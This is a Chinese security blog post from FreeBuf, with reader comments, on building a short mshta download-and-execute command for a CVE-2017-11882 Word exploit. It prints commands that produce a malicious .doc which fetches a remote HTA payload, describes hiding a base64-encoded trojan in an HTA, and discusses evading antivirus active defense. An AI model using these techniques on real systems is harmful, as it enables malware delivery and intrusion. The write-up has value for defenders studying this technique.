mshta

mshta
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
浅谈一下mshta在CVE-2017-11882里的命令构造 lcx2017-12-01现金奖励共503640人围观，发现 20 个不明物体 WEB安全
* 本文作者：lcx，本文属FreeBuf原创奖励计划，未经许可禁止转载

Evi1cg同学前不久放出CVE-2017-11882的一个 python利用脚本，地址在https://github.com/Ridter/CVE-2017-11882/，不过其中一个版本里边有一个限制，执行命令只能用43个字节。如果要用43个字节来完成一个文件的下载执行，在我所掌握的命令行知识里，除了mshta命令，其它的好像都做不到。所以在这里我就浅谈一下如何构造这个mshta命令，另外提一下hta文件在安全方面的一个应用。

mshta.exe是微软Windows操作系统相关程序，用于执行.HTA文件。HTA是HTML Application的缩写（HTML应用程序），是软件开发的新概念，直接将HTML保存成HTA的格式，就是一个独立的应用软件，与VB、C++等程序语言所设计的软件界面没什么差别。mshta执行.hta文件，是以当前用户权限执行，hta文件可以随便改后缀，也可以本地或远程执行，本地执行的时候，要记得带全路径名，否则会出错。另外,mshta支持各种协议，甚至支持mk:@MSITStore协议或是ms-its协议。

timg.jpg

一、HTA文件内嵌的html文件如何去除本地安全认证呢？
我们知道，html文件打开的宿主如果是IE，html文件里调用的是像Wscript.Shell此类组件的话，IE会弹一个框，限制运行脚本或Active控件。我们来验证一下，写代码1.htm如下：

1.png

如果我们用HTA文件来iframe这个1.htm，hta是本地用户权限，应当可以绕过此限制，如何绕呢？我们就要用到 iframe的一个参数了application=”yes”了。这样就不会弹阻止框了，可以干坏事了，1.hta代码如下：

Sample HTML Application one

<br />

二、如何写一个高效的下载执行过杀软的hta文件？
如果是下载执行的话，哪就很弱了。hta文件里可以自由地写vbscript代码，所以我们的思路是可以把你的木马转换成base64格式也好，转换成16进制也好再转回来，hta只是访问了一个网页而已，但是已经把木马转到本地了，具体代码1.hta可以如下：

然后，你可以把这个1.hta改名1.xml之类的文件放在远程空间了，直接mshta http://www.site.xom/1.xml，就可以了。如果是利用CVE-2017-11882.py，哪么直接执行下边命令就生成了，其中http://site.com/1.xml你可以换成短网址。

python27 Command_CVE-2017-11882.py -c "mshta http://site.com/1.xml" -o test.doc
下图是我做的测试图。

2.png

* 本文作者：lcx，本文属FreeBuf原创奖励计划，未经许可禁止转载

lcx
5 篇文章
等级： 3级
||
上一篇：企业安全经验 | 应急响应的战争下一篇：利用Burp Suite挖掘暗网服务的真实IP
这些评论亮了

lcx (3级)回复
@ hjchjcjh 你说的都不对。核攻击和我不是同一个人。我是海阳顶端asp木马的作者。lcx.exe虽然是我修改编译自htran1.0的，并写篇文章让大家都了解了lcx.exe用法，但原作者也不是我呀，是以前大名鼎鼎的lion呀，并且htran最终版本到2.4。关于lcx.exe这个事太多人问我了，唉，让我很惭愧。
)7(亮了
发表评论已有 20 条评论

jimoyong (5级) 2017-12-01回复 1楼
不错

亮了(0)

hjchjcjh (3级) 愿漂泊的人都有酒喝孤独的人都会唱歌 2017-12-01回复 2楼
lcx？请问你是核攻击还是lcx.exe的作者呢？

亮了(1)

lcx (3级) 2017-12-01回复
@ hjchjcjh 你说的都不对。核攻击和我不是同一个人。我是海阳顶端asp木马的作者。lcx.exe虽然是我修改编译自htran1.0的，并写篇文章让大家都了解了lcx.exe用法，但原作者也不是我呀，是以前大名鼎鼎的lion呀，并且htran最终版本到2.4。关于lcx.exe这个事太多人问我了，唉，让我很惭愧。

亮了(7)

guest 2017-12-01回复
@ hjchjcjh 我猜是lcx.exe作者，btw，核jj就是个（）自己填空。

亮了(0)

yllen 2017-12-01回复 3楼
所以一个“延迟启动”方式的WriteBin绕过了哪家的主防？

亮了(0)

lcx (3级) 2017-12-01回复
@ yllen 如果不是调用了mshta ，是VBS的话，用WriteBin你试一下，过所有主防。主防只是提醒调用了一下mshta 。这里的hta是没办法过主防的，因为受到一些限制。主防不会阻止一个vbs防问一个xml文件，用hta有提醒。再是你把里边的vbs代码提取出来，写sct也好，写wsf也好，代码都直接能用。

亮了(0)

yllen 2017-12-01回复
@ lcx 重点是writebin没问题，你写注册表启动项有问题，大兄弟

亮了(0)

lcx (3级) 2017-12-01回复
@ yllen 是的，你没看我在程序里的注释：’用rundll32加启动项，这个过不了杀软主防,聊胜于无。我过主防的启动项方法肯定不能放出来呀。程序里这个方法最早是过的，用了半个月让360给抓了。

亮了(2)

yllen 2017-12-01回复
@ lcx 哈哈，lcx兄弟是haiyang那个吗

亮了(0)

lcx (3级) 2017-12-01回复
@ yllen 是我

亮了(1)

lr3800_ (4级) 安全猎人 lr3800.com 2017-12-01回复 4楼
你这酱紫也过不了杀软主动防御,写16进制文件不做免杀一样执行不了；为什么要大费周折;一句话的命令不是照样下载执行木马

亮了(1)

lcx (3级) 2017-12-01回复
@ lr3800_ 我这不是这载执行的，只是访问了一个网页，明白吗？再是你一句话下载执行放到c:\，你考虑了权限的问题没有，在WIN10下你根本下载不到c盘，还有一大批用户只有一个c盘，特别是国外的人。

亮了(1)

谢谢楼主 2017-12-01回复
老C啊，好久不见，还这么专注于技术，真心佩服啊。

亮了(0)

yuanyunfeng3 (1级) 2017-12-01回复
@ lcx win10下c:\windows\temp可以写的吧

亮了(2)

unamer 2017-12-01回复 5楼
我表示直接代码执行更好用

亮了(1)

asdxz (1级) 2017-12-10回复
@ unamer 这是一种姿势，不光可以用在2017-11882

亮了(0)

死宅10086 (7级) 2017-12-01回复 6楼

亮了(1)

m′哽咽 (1级) 2017-12-01回复 7楼
钱是多了,但是回复比写还累.弄不好还挨顿喷

亮了(1)

n0jobs (1级) 2017-12-05回复 8楼
学习了，非常感谢！！！！

亮了(0)

1111 2017-12-06回复 9楼
用43个字节来完成一个文件的下载执行,还可以用msiexec

可以参考这篇文章：

https://xianzhi.aliyun.com/forum/topic/1649/

亮了(1)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我

lcx

这家伙太懒，还未填写个人描述！

5
文章数
27
评论数
最近文章
捡拾VBS应用层里的明珠
2018.02.22

命令行下的“蒙面歌王”rundll32.exe
2018.01.29

浅谈一下mshta在CVE-2017-11882里的命令构造
2017.12.01

浏览更多
相关阅读
疑似“海莲花”组织早期针对国内高校的攻击活动分析腾讯反病毒实验室预警：CVE-2017-11882漏洞最新利用方法CVE-2017-11882新动态：利用AutoIT脚本释放DarkComet后门浅谈一下mshta在CVE-2017-11882里的命令构造又出新玩法？微软公式编辑器系列漏洞新利用方式
特别推荐

关注我们分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

mshta

文章评论